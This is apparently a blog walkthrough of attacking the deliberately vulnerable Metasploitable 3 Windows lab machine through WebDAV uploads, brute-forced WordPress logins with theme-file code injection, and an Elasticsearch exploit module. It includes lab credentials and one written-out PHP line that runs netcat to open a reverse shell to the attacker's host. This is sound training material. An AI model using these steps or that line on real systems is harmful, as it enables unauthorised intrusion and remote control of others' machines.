Metasploitable 3 Windows Walkthrough: Part X

Exploiting Port 8585 – WebDAV

There are multiple services running on this single port.

Services running on Metasploitable 3 port 8585

Web Distributed Authoring and Versioning is an extension of the Hypertext Transfer Protocol that allows clients to perform remote Web content authoring operations. In Metasploitable3, the uploads directory looks promising and for now it is completely empty:

The uploads directory

Enumerating WebDAV using Directory Buster

Directory Buster (dirb) is a nice tool that brute forces directories on a webserver.

Enumerating with dirb

Enumerating with dirb

Now you can use several methods to determine if you’re allowed to upload files to this directory with the HTTP PUT method

Enumerating WebDAV using Nmap

Enumerating with nmap

Enumerating with nmap

As you can see, the webserver allows you to upload files to the uploads directory and even delete files.

Enumerating WebDAV using Nikto

You can also use this web vulnerability scanner to identify features in the webserver. If the HTTP PUT method is enabled than Nikto will indicate this as following:

Enumerating with Nikto

The last line of Nikto output indicates that the uploads directories allows uploading files using HTTP PUT.

Enumerating WebDAV using Metasploit

Using Metasploit you can also do WebDav Enumeration.

Enumerating WebDAV with Metasploit

As you can see, the uploads directory is writable and a number of different file formats can be uploaded over there.

Exploiting WebDAV

Uploading a payload to WebDAV

Now that you know that you can upload files to the server, the next step is creating a Meterpreter PHP reverse shell script to be deployed to the webserver. Create the scripts with these parameters:

  • Kali IP: 172.16.1.6
  • Kali port: 5555

Creating a payload with msfvenom

Now setup a listener to receive the incoming connection choosing the correct payload:

Starting a Metasploit listener

Now you have multiple options to deploy the payload to the target machine.

Exploiting WebDAV using Nmap

Nmap has a script created exactly to take advantage of the HTTP PUT method. Because port 8585 is not defined as an HTTP service port in the Nmap services file it is fundamental that you run a service scan with the -sV flag. Otherwise, the script will fail in uploading the file and will only display an open port and unknown service.

Uploading the payload with Nmap

Now, if you browse the uploads directory and click on the payload.php file you will get a meterpreter shell:

Executing the payload

Meterpreter shell

This is low privilege shell, but it’s a start.

Before you try some other deployment methods, close the meterpreter session and remove the previous payload from the WebDAV server using curl:

Deleting the payload with curl

Exploiting WebDAV using Metasploit

You can also use the Metasploit auxiliary module HTTP PUT to upload a file to the uploads web directory. Use the previously created payload:

Uploading the payload with Metasploit

Metasploit is showing us that the upload has failed, but when we check the uploads directory on the webserver we can see that the file upload did go through.

Executing the payload

Setup the same listener as before and repeat the same procedure of browsing and clicking the payload on the target server.

Meterpreter shell

Exploiting WebDAV using curl

You can also upload the payload using curl:

Uploading the payload with curl

Exploiting WebDAV using cadaver

Finally, you can also use cadaver to upload the file:

Uploading the payload with cadaver

Exploiting Port 8585 – Wordpress

From the start page, if you click on the wordpress link under Your Projects you will see the WordPress website running on the target server.

Metasploitable 3 Wordpress website

The link to the login page will take you to /wordpress/wp-login.php

Wordpress login page

You already have the credentials because you’ve managed to crack the hashes before, remember? Anyway, forget about that and try to get them again.

Brute forcing Wordpress using Nmap

Use your customized wordlists to speed up the process

Brute forcing Wordpress with Nmap

You have found four valid sets of credentials.

Brute forcing Wordpress using Metasploit

Brute forcing Wordpress with Metasploit

Brute forcing Wordpress using WPScan

WPscan is a powerful tool that can also be used to brute force the access to a WordPress website:

Brute forcing Wordpress with WPscan

Brute forcing Wordpress with WPscan

Now, with a valid login you can access the admin page:

Wordpress admin page

Try to get as much information as possible about your target:

Enumerating Wordpress using Nmap

Enumerating Wordpress with Nmap

Important information: the installed plugins…

Enumerating Wordpress with Nmap

NOTE: Pay attention to the syntax of the NSE scripts.

Enumerating Wordpress using WPScan

This is supposed to be the ultimate tool when it comes to getting information about any WordPress site:

Enumerating Wordpress with WPscan

Enumerating Wordpress with WPscan

Enumerating Wordpress using Metasploit

This module will enumerate the existing users and then it will check for valid credentials.

Enumerating Wordpress with Metasploit

Exploiting Wordpress

You can login to the website but what you want is a shell, right? In WordPress you can’t deploy files to the website but you can add code to the existing pages.

Login to WordPress either using admin/sploit or vagrant/vagrant and open the Appearance > Editor

Accessing the Wordpress Editor

On the right side, select a PHP file preferably header.php.

Selecting the header.php script

You will see the PHP code for that page:

Header.php code

Exploiting Wordpress using Metasploit

To open a meterpreter shell, create a proper payload wit MSFVenom:

Creating a payload

Open the generated payload and adjust the code uncommenting the beginning and adding the proper closing PHP tag at the end:

Adjusting the payload's PHP code

Now insert this code at the top of the header.php code editor:

Inserting the payload code

Press the Update File button

Saving the altered code

Now, setup a listener on the Kali machine, ready to receive the incoming connection:

Starting a Metasploit listener

Go back to your browser and reload the WordPress homepage:

Reloading the Worpress page

And you have a shell to the target machine

Meterpreter shell

Enumerating Wordpress using Netcat

If the target machine has Netcat or a similar tool installed, it can be used to open a simple reverse shell.

Add the following code to the page, using Kali’s IP and listener port:

<?php echo shell_exec(“nc.exe 172.16.1.6 5555 -e cmd.exe”); ?>

Adding the command to open a reverse shell

Press the Update File button

Saving the altered code

Now setup a Netcat listener on Kali:

Starting a Netcat listener

Now, reloading the WordPress homepage on the browser will run the Netcat or clone command and a reverse connection to Kali will be created.

Exploiting Port 9200 – Elastic Search

Elasticsearch is a real-time distributed and open source full-text search and analytics engine and is known to have a couple of Remote Code Execution vulnerabilities. Start by accessing Metasploitable3’s IP address over port 9200:

Elastic Search start page

Enumerating Elastic Search using Metasploit

There is a Metasploit module to get information about the service:

Enumerating Elastic Search with Metasploit

You can even get files from the target machine:

Enumerating Elastic Search with Metasploit

Exploiting using Metasploit

Metasploit also has a module to exploit a vulnerability present in this version (1.1.1) of the service:

Exploiting Elastic Search with Metasploit


Next post: Metasploitable 3 Ubuntu Walkthrough: Part I

No comments: